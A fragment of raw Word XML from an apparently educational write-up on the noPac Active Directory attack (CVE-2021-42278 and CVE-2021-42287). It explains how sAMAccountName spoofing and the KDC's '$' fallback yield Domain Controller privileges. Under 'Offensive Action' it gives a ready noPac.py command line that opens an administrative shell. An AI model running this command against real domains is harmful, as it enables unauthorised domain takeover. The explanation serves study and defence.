          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The Core Flaws Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777063C6" w14:textId="7E36C429" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:num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 xml:space="preserve">CVE-2021-42278 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sAMAccountName</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAFA067" w14:textId="4AD0D0ED" w:rsidR="006F4908" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Historically, Windows machine accounts always ended with a trailing dollar sign (e.g.,  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DC01$</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), while user accounts did not; however, Active Directory did not strictly validate or enforce this rule when an object name had been modified. A low-privileged user with permissions to add a computer to the domain could rename that computer account to completely omit the trailing </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., changing </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NEWCOMP$</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DC01</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), directly mimicking the name of a legitimate Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592F59C9" w14:textId="77777777" w:rsidR="0024425A" w:rsidRPr="00BA13B0" w:rsidRDefault="0024425A" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EB2124" w14:textId="417E5E33" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:num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CVE-2021-42287 – PAC Parsing and Automatic Kerberos Fallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA4CB00" w14:textId="0251191F" w:rsidR="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="00BA13B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Privilege Attribute Certificate (PAC) is the extension inside a Kerberos ticket that lists a user’s group memberships and privileges. When a machine account (without the trailing </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> request</w:t>
      </w:r>
      <w:r w:rsidR="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a Ticket Granting Service (TGS) ticket, the Key Distribution Center (KDC) searches for that exact name. If it fails to find the account (because the attacker possibly deleted or renamed it back to its original state </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">after </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">getting the initial TGT), the KDC safely assumes it was </w:t>
      </w:r>
      <w:r w:rsidR="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">just a minor </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>glitch in the matrix.</w:t>
      </w:r>
      <w:r w:rsidR="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21FF5F" w14:textId="77777777" w:rsidR="00BA13B0" w:rsidRPr="00BA13B0" w:rsidRDefault="00BA13B0" w:rsidP="00BA13B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EE8BE9" w14:textId="16A314FE" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:num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lastRenderedPageBreak/>
        <w:t>The Flaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080E367C" w14:textId="04D299A5" w:rsidR="006F4908" w:rsidRPr="00C943DC" w:rsidRDefault="006F4908" w:rsidP="00C943DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of failing, the KDC will automatically append a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the search query. By searching for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DC01$</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it locates the real, </w:t>
      </w:r>
      <w:r w:rsidR="00BA13B0" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly privileged</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Domain Controller account and generates a TGS using the Domain Controller’s elevated PAC privileges instead of the attacker’s low-privileged identity.</w:t>
      </w:r>
      <w:r w:rsidR="00C943DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A004F" w14:textId="3587DADB" w:rsidR="006F4908" w:rsidRPr="006F4908" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Technical Execution – Exploiting Computer Name Validation Vulnerabilities (noPac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CA88E" w14:textId="77777777" w:rsidR="006F4908" w:rsidRDefault="006F4908" w:rsidP="006D3130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112511DD" w14:textId="5143CF18" w:rsidR="00676591" w:rsidRPr="006D3130" w:rsidRDefault="00556DCC" w:rsidP="006D3130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit inconsistencies in </w:t>
      </w:r>
      <w:r w:rsidRPr="006D3130">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sAMAccountName</w:t>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes alongside identity generation parsing bugs (CVE-2021-42278 &amp; CVE-2021-42287) to impersonate a Domain Controller.</w:t>
      </w:r>
      <w:r w:rsidR="006D3130">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62566A20" w14:textId="02D1E347" w:rsidR="00556DCC" w:rsidRPr="00C943DC" w:rsidRDefault="00556DCC" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C943DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Offensive Action:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2"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76591" w14:paraId="02B9698A" w14:textId="77777777" w:rsidTr="00676591">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F88A5B1" w14:textId="77777777" w:rsidR="00676591" w:rsidRDefault="00676591" w:rsidP="00676591">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="302DF07E" w14:textId="5862C0BB" w:rsidR="00676591" w:rsidRDefault="00676591" w:rsidP="00676591">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00676591">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Execute automated noPac identity validation exploit chain to open an interactive administrative shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5083DAB2" w14:textId="77777777" w:rsidR="00676591" w:rsidRPr="00676591" w:rsidRDefault="00676591" w:rsidP="00676591">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08B9BBB5" w14:textId="77777777" w:rsidR="00676591" w:rsidRDefault="00676591" w:rsidP="00676591">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00676591">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>python3 noPac.py domain.</w:t>
            </w:r>
            <w:r w:rsidRPr="00676591">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="0F9ED5" w:themeColor="accent4"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:r w:rsidRPr="00676591">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00676591">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="A02B93" w:themeColor="accent5"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>LowPrivUser:TargetPassword123</w:t>
            </w:r>
            <w:r w:rsidRPr="00676591">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -shell -</w:t>
            </w:r>
            <w:r w:rsidRPr="00676591">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="0F9ED5" w:themeColor="accent4"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
            <w:r w:rsidRPr="00676591">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-ldap -dc-ip &lt;DC_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EBF7A09" w14:textId="6D6FED7C" w:rsidR="00676591" w:rsidRPr="00676591" w:rsidRDefault="00676591" w:rsidP="00676591">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BB2C28B" w14:textId="77777777" w:rsidR="00676591" w:rsidRPr="00676591" w:rsidRDefault="00676591" w:rsidP="00676591">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E9117B3" w14:textId="2C5F623B" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit script automates the process of creating a temporary machine account, stripping the trailing </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and renaming it to impersonate a target DC, requesting a Kerberos ticket, and using the resultant TGS to spawn a high-privileged administrative shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79504D43" w14:textId="77777777" w:rsidR="00BA13B0" w:rsidRPr="00BA13B0" w:rsidRDefault="00BA13B0" w:rsidP="00BA13B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070CF5AE" w14:textId="29444B32" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mechanism:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The script leverages native Active Directory actions that unprivileged users are permitted to perform by default, tricking the KDCs parsing logic into generating a token with Domain Admin authority embedded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576399F4" w14:textId="77777777" w:rsidR="00BA13B0" w:rsidRPr="00BA13B0" w:rsidRDefault="00BA13B0" w:rsidP="00BA13B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE6D0E9" w14:textId="18B0F2E9" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Target:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers target the Kerberos Authentication Service (AS) and Ticket Granting Service (TGS) running on the target Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E10C232" w14:textId="77777777" w:rsidR="00BA13B0" w:rsidRDefault="00BA13B0" w:rsidP="00BA13B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
